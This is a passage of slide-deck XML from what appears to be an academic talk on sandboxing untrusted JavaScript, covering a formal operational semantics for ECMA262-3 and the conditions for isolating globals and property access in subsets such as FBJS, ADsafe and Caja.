              <a:t>Scope can be a first-class object: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> === o;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Can convert strings into code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>(“o + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>o.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>()”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Implicit type conversions, that can be redefined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>o.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>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25</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4000" smtClean="0"/>
              <a:t>JavaScript Operational Semantics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Core of JavaScript is standardized as ECMA262-3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Browser implementations depart from (and extend) specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No formal semantics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Developed formal semantics as basis for proofs [APLAS08]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>We focused on the standardized ECMA 262-3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>DOM considered as library of host objects	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>We experimented with available browsers and shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Defining an operational semantics for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> programming language is hard: sheer size and JavaScript peculiarities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We proved sanity-check properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Programs evaluate deterministically to values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Garbage collection is feasible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Subset of JS adequate for analyzing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, FBJS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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26</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Operational Semantics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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27</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pic>
        <p:nvPicPr>
          <p:cNvPr id="35842" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="828675" y="1543050"/>
            <a:ext cx="7486650"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for JavaScript Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="-25000"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400" dirty="0" smtClean="0"/>
              <a:t>All explicit property access has form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[e2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The implicitly accessed property names are: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>0,1,2,…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>toNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>arguments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>RegExpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dynamic code generation (converting strings to programs) occurs only through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and indirectly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A pointer to the global object can only be obtained by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, native method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and native methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Array.prototype</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Pointers to local scope objects through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>try/catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, “named” recursive functions ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> f = function g(..){… g(..)… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>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Isolating global variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> security goals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can be achieved by blacklisting global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>bj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>FacebookLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object property names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>too</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>property access (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,…).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables are properties of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scope objects:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>x; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
